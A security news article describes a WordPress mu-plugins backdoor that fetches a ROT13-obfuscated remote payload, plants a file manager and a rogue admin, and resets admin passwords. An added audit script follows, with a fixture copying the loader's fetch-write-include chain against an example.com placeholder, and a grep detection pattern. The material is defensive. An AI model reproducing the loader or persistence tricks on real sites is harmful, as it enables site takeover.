
Cybersecurity researchers have discovered a new stealthy backdoor hidden in the "mu-plugins" directory of WordPress sites that grants threat actors persistent access and lets them perform any action on the site.
Must-use plugins (aka mu-plugins) are a special class of plugins that are automatically activated on every site in a WordPress installation. By default, they live in the "wp-content/mu-plugins" directory.
What makes them attractive to attackers is that mu-plugins do not appear in the default plugin list on the wp-admin Plugins page and cannot be disabled except by removing the plugin files from the mu-plugins directory.

As a result, some malware that utilizes this technique can function quietly without raising a red flag.
In the infection discovered by web security company Sucuri, a PHP script in the mu-plugins directory ("wp-index.php") acts as a loader, fetching a remote payload and storing it in the WordPress database in the wp_options table under the key _hdra_core.
The remote payload is retrieved from a URL obfuscated with ROT13, a simple substitution cipher that replaces each letter with the letter 13 positions after it in the alphabet (i.e. a becomes n, b becomes o, and c becomes p).

"The fetched content is then temporarily written to disk and executed," said security researcher Puja Srivastava. "This backdoor provides attackers with permanent access to the site and the ability to run PHP code remotely."
Specifically, it injects a hidden file manager into the theme directory as "pricing-table-3.php", which allows the threat actors to view, upload, or delete files. It also creates an admin user named "officialwp" and downloads and activates a malicious plugin ("wp-bot-protect.php").
In addition to reviving the infection if it is deleted, the malware can change the passwords of common administrator usernames such as "admin", "root", and "wpsupport" to a default password set by the attacker. This also extends to its own "officialwp" user.

In doing so, the threat actors gain permanent access to the site, can take malicious actions, and effectively lock out other administrators. Those actions range from data theft to inserting code that serves malware or redirects visitors to other sites.
"Attackers get full admin access and permanent backdoors, allowing the site to do anything from installing more malware to tainting it," says Srivastava. "The characteristics of remote command execution and content injection mean that attackers can change the behavior of the malware."
To mitigate these threats, site owners should keep WordPress, themes and plugins up to date, secure their accounts with two-factor authentication, and regularly audit every part of the site, including the theme, plugin and mu-plugin files.
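As an added example (not Sucuri's or WordPress's code), the following POSIX shell script audits a mu-plugins directory for the loader pattern described above (ROT13 decoding, remote fetch, write to disk, dynamic execution) and decodes any ROT13 string literals it finds so an analyst can read the real URL without running the file. The directory layout, the two sample files built by make_fixture, and the example.com placeholder URL are assumptions constructed for this demonstration; point audit_mu_plugins at a real wp-content/mu-plugins path to use it on a site.

```shell
#!/bin/sh
# Added example: audit a WordPress mu-plugins directory for the fetch-write-
# execute loader pattern and decode ROT13 literals. Not the project's or
# Sucuri's code; paths and fixture files below are constructed assumptions.

# Decode ROT13 (the substitution the loader uses to hide its payload URL).
rot13() {
    printf '%s' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
}

# Print the path of every .php file under $1 that contains an indicator of the
# loader chain: ROT13 decoding, a remote fetch, a write to disk, or dynamic
# execution. Legitimate mu-plugins rarely need any of these.
audit_mu_plugins() {
    for f in "$1"/*.php; do
        [ -f "$f" ] || continue
        if grep -qE 'str_rot13|file_get_contents|curl_exec|file_put_contents|eval\(|include[ (]' "$f"; then
            echo "$f"
        fi
    done
}

# Number of flagged files, for use in checks and cron jobs.
count_suspicious() {
    audit_mu_plugins "$1" | wc -l | tr -d ' '
}

# Extract every str_rot13('...') literal from a file and print it decoded.
decode_rot13_literals() {
    grep -o "str_rot13('[^']*')" "$1" | sed "s/str_rot13('\(.*\)')/\1/" | while IFS= read -r enc; do
        rot13 "$enc"
        echo
    done
}

# Build a constructed fixture: one benign mu-plugin and one file that mirrors
# the loader shape with an inert placeholder URL (example.com). Prints the dir.
make_fixture() {
    d=$(mktemp -d)
    cat > "$d/site-tweaks.php" <<'EOF'
<?php
// Benign must-use plugin: only registers a filter.
add_filter('the_title', function ($t) { return trim($t); });
EOF
    cat > "$d/wp-index.php" <<'EOF'
<?php
// Constructed fixture mirroring the described loader shape; placeholder URL only.
$u = str_rot13('uggc://rknzcyr.pbz/cnlybnq');
$c = file_get_contents($u);
$tmp = tempnam(sys_get_temp_dir(), 'wp');
file_put_contents($tmp, $c);
include $tmp;
EOF
    echo "$d"
}

# Stand-alone run: build the fixture, audit it, decode what was found.
demo_dir=$(make_fixture)
echo "suspicious files: $(count_suspicious "$demo_dir")"
for f in $(audit_mu_plugins "$demo_dir"); do
    echo "$f -> $(decode_rot13_literals "$f")"
done
rm -rf "$demo_dir"
```

The grep is deliberately broad: a flagged file is a candidate for manual review, not a verdict, and a file that combines ROT13 with a remote fetch and an include is the shape worth pulling into a sandbox. Pair the directory audit with a check of the wp_options table (for example with WP-CLI, `wp option get _hdra_core`) and a review of administrator accounts, since the article notes the infection persists in the database and adds its own admin user.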